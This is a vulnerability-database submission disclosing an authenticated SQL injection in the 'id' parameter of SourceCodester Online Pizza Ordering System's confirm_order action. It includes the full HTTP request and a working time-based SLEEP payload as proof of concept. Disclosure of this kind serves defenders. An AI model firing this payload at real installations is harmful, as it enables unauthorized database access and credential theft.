提出 #216885: SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'情報

タイトルSourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'
説明Affected Software: SourceCodester Online Pizza Ordering System v1.0 https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391 Tested On: Ubuntu Server 22.04.3 LTS Affected URL: http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order Request: POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 5 Origin: http://x.x.x.x Connection: close Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx id=1 Affected Parameter: id Proof of Concept: POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 5 Origin: http://x.x.x.x Connection: close Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE) Impact: SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials. Summary: An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.
ユーザー
 simon.davis8080 (UID 54983)
送信2023年10月05日 10:30 (3 年 ago)
モデレーション2023年10月05日 12:01 (2 hours later)
ステータス承諾済み
VulDBエントリ241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order 識別子 SQLインジェクション]
ポイント17

Might our Artificial Intelligence support you?

Check our Alexa App!